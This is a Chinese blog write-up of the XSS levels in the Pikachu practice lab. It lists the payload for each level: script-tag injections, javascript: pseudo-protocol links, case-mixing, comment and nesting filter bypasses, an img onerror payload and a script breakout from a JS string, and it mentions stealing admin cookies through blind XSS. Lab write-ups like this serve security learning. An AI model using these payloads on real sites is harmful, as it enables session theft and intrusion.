xss-pikachu

r1ck9

xss-pikachu

第一关

反射型xss(get)漏洞利用

图片\.png

20->100
键入<script>alert(1)</script>

第二关

反射性xss(post)

登录 admin 123456
后同第一关 键入<script>alert(1)</script>

第三关

存储型xss

键入<script>alert(1)</script>

与一二关不同的是,键入后以后每次点开这个url 就会自动弹出 1
说明我们键入的内容被html记录了

第四关

DOM型xss

同样先键入<script>alert(1)</script>,click,无反应,F12进行查看

图片\.png

看来是输入内容被当成了href的值

使用 **JavaScript 伪协议 **

键入javascript:alert(23)
然后点击下方出现的蓝色连接,即可出弹窗

图片\.png

第五关

DOM型xss

同第四关

第六关

xss盲打

XSS盲打就是攻击者在进行XSS插入时不会在前端有回显,但是在后台可以看得到,当管理员进行后台登录时就会看到XSS的内容,如果存在这种漏洞危害性还是很大的,因为能直接盗取管理员的COOKIE拿到权限,但又十分隐蔽,只能进行尝试不能确保一定存在。

图片\.png

第七关

xss之过滤

大小写过滤即可<scrIPt>alert(1)</scriPT>

常用

Text
1
2
3
4
大小写混淆过滤:    <scRipt>alert(14)</sCript>
使用注释进行干扰: <sc<!--test--> ript> alert(14)</scr <--test--> ipt>
重写: <scri<script> pt> alert(14)</scri</script> pt>
使用img标签<img src=xss onerror="alert(11)">

第八关

xss之htmlspecialchars

JavaScript 伪协议即可javascript:alert(1)

图片\.png

第九关

同第八关

第十关

xss之js输出

tmac'</script><script>alert(1)</script>

  • 标题: xss-pikachu
  • 作者: r1ck9
  • 创建于 : 2026-01-12 01:52:12
  • 更新于 : 2026-08-12 16:39:28
  • 链接: https://www.r1ck9.top/2026/01/12/xss-pikachu/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论